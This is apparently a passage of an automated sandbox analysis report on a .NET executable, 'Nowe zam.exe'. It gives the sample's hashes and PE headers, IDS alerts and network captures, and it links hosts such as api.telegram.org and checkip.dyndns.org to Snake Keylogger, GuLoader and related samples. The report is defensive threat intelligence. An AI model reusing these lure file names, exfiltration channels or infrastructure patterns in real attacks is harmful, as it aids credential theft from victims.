                                                                                                              158.101.44.242Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Offer-7839373637-8839373-Quote8992832.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              NOAH $$$$.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              reallyfreegeoip.orgCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              api.telegram.orgCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              bg.microsoft.map.fastly.netIEPSmartIS.Production.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.210.172
                                                                                                              IEPSmartIS.Production.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.214.172
                                                                                                              SecuriteInfo.com.Variant.Symmi.42162.17217.532.dllGet hashmaliciousNumandoBrowse
                                                                                                              • 199.232.214.172
                                                                                                              VDsZYqbfHI.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              • 199.232.210.172
                                                                                                              iB0IycHNEN.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              • 199.232.214.172
                                                                                                              https://E.vg/FoedcaVhTGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.214.172
                                                                                                              nl698mrFYA.exeGet hashmaliciousStealcBrowse
                                                                                                              • 199.232.210.172
                                                                                                              https://gabrielcoste.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                              • 199.232.210.172
                                                                                                              https://nfetgz.hascl.co.uk/YvkFcBQOGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.210.172
                                                                                                              https://nfetgz.hascl.co.uk/YvkFcBQOGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.210.172
                                                                                                              mail.tlakovec.siZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 212.44.112.138
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://berg.bergssrom.mom/fer.to.php.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.170.96
                                                                                                              FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CLOUDFLARENETUSCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              https://sendspace.com/pro/z42su8Get hashmaliciousMamba2FABrowse
                                                                                                              • 172.67.170.105
                                                                                                              C2jr42FUsv.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 172.67.133.135
                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                              • 104.21.5.155
                                                                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.133.135
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              https://E.vg/FoedcaVhTGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              https://worldpay.merchant-dispute.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 162.247.243.39
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 172.67.133.135
                                                                                                              ORACLE-BMC-31898USCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              vHXObqOSGu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              DHH-ASSIZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 212.44.112.138
                                                                                                              SMBKT-20242005.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 212.44.102.65
                                                                                                              a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.75
                                                                                                              G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.75
                                                                                                              x607DB0i08.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.75
                                                                                                              x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 212.44.102.75
                                                                                                              EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.75
                                                                                                              OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.75
                                                                                                              demand_rpkb_060923.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              • 212.44.101.105
                                                                                                              CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                                                                                                              • 212.44.102.57
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eCe3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://sendspace.com/pro/z42su8Get hashmaliciousMamba2FABrowse
                                                                                                              • 149.154.167.220
                                                                                                              C2jr42FUsv.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              List Furniture.batGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              BB.batGet hashmaliciousBraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              getup.ps1Get hashmaliciousLummaCBrowse
                                                                                                              • 149.154.167.220
                                                                                                              New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Nvojocm.exeGet hashmaliciousDarkCloudBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1172
                                                                                                              Entropy (8bit):5.3601602641425945
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:3CytZWSeUo4KmBs4RPT6BmFoUebDomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSeR4y4RQmFoUe4mfmZ9tK8NDE
                                                                                                              MD5:0EE55C0A89EE908D4FA304C9EB8875B9
                                                                                                              SHA1:BABE64A045CFA48411038982F7926C0DB75F24D5
                                                                                                              SHA-256:D6838F36001F4FF9513A804BAA5EC824C9D9F68FA0FBFA11F00FB4D71EDDD6F5
                                                                                                              SHA-512:65E319DC8D39A35E8B11CCD24891BE9CB07CF0A1DB3286AC7666CC1563BBB5E6C4BE873C211D01652FCEA076497E53E51EB5636AE37C99F4F5D751FE9C25C080
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................~..2K..}...0........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.970917263545694
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:Nowe zam.exe
                                                                                                              File size:878'080 bytes
                                                                                                              MD5:d29c5fb95585ed107d8473d204d520ae
                                                                                                              SHA1:4a008ac6426aa63e7fbb7ce25810342efaeb6607
                                                                                                              SHA256:5a8467ab773f458f57d5942d6fe612c5048c50b19e7d63c82ff1eac99a324e2b
                                                                                                              SHA512:e8091d7c0bffeafe9642e55db9520475db1c3a6a6355a8e10f20971af036cdd94e9c1067b75bccc4ccd542b361839fa27bf743e103ba3c08495fbebc4ca149cc
                                                                                                              SSDEEP:12288:i1je1F7Y7dLYe5/OMM8kWXoCfKMbe7Tp4LB3GGlpFDVxhMFWYwZf:i1K1FidR/OMZ3dbspaB3GGlppndZ
                                                                                                              TLSH:FB1523F621221B17C95207B063204E8C82BD736D37A7CD8C9495AB4E7E93F8D679D853
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g..............0..B...".......`... ........@.. ....................................@................................
                                                                                                              Icon Hash:13256c6c6c6c6cec
                                                                                                              Entrypoint:0x4d6006
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x672C9786 [Thu Nov 7 10:33:42 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd5fb40x4f.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x1f48.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xd400c0xd4200ef12a3fba105ebd295feb66631f947aaFalse0.9429933798615203data7.9748723738404985IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xd80000x1f480x20003e4fdb32ed0ee7dbe6caafe7be4034b7False0.88330078125data7.5532433344944385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xda0000xc0x2009c3d4e25c568d36584d50b5ee8b72501False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xd80c80x1b3fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9697491039426523
                                                                                                              RT_GROUP_ICON0xd9c180x14data1.05
                                                                                                              RT_VERSION0xd9c3c0x306data0.4418604651162791
                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-11-07T12:49:08.847175+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249713158.101.44.24280TCP
                                                                                                              2024-11-07T12:49:10.237782+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249713158.101.44.24280TCP
                                                                                                              2024-11-07T12:49:10.966242+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1249716188.114.96.3443TCP
                                                                                                              2024-11-07T12:49:11.659674+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249717158.101.44.24280TCP
                                                                                                              2024-11-07T12:49:15.186421+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1249724188.114.96.3443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 7, 2024 12:49:00.418792963 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.421960115 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.440818071 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.440838099 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.441044092 CET49709443192.168.2.1213.107.246.45
